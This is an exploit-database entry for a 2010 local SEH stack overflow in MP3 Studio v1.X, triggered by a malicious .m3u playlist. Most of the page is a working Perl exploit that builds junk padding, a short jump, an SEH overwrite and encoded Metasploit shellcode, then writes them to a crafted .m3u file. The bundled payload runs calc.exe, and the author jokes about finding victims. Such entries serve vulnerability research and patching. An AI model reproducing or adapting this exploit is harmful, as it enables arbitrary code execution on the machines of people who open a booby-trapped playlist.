MP3 Studio v1.X (.m3u File) Local Stack Overflow

vendor:

MP3 Studio

by:

NeoCortex

7,8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: MP3 Studio

Affected Version From: 1.X

Affected Version To: 1.X

Patch Exists: YES

Related CWE: N/A

CPE: a:millennium_mp3_studio:mp3_studio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 (de-de)

2010

MP3 Studio v1.X (.m3u File) Local Stack Overflow

This exploit is a local stack overflow vulnerability in MP3 Studio v1.X. It was originally discovered by HACK4LOVE and was later modified by NeoCortex. The exploit is triggered when a malicious .m3u file is opened in the vulnerable application. This causes a buffer overflow which allows an attacker to execute arbitrary code on the target system.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow
# Date: 19.01.2010 - 01/19/2010
# Author: NeoCortex
# Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio
# Version: 1.X
# Tested on: Windows XP SP3 (de-de)

# Original exploit found by HACK4LOVE
# http://www.milw0rm.com/exploits/9277
# 
# Nice training on seh exploits.
# Good luck finding some buddy using that media player
# 
# Greetz to:
# _-Sid-_ - Jess - >Roadkill< - Dawn - MouZe* - Linki
# 
# 19.01.2010 by NeoCortex

my $noa = "http://"."\x41" x 4103; # junk
my $jmp = "\xeb\x1b\x90\x90"; # 00125D64   EB 1B		JMP SHORT 00125D81
my $seh = "\x25\x12\xc8\x72"; # 00125D68   72C81225		SE handler
my $nob = "\x42" x 22; # cosmetic...

my $payload =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";

open(myfile,'>> Neo_Crash.m3u');
print myfile $noa.$jmp.$seh.$nob.$payload;
-- 
Preisknaller: GMX DSL Flatrate für nur 16,99 Euro/mtl.!
http://portal.gmx.net/de/go/dsl02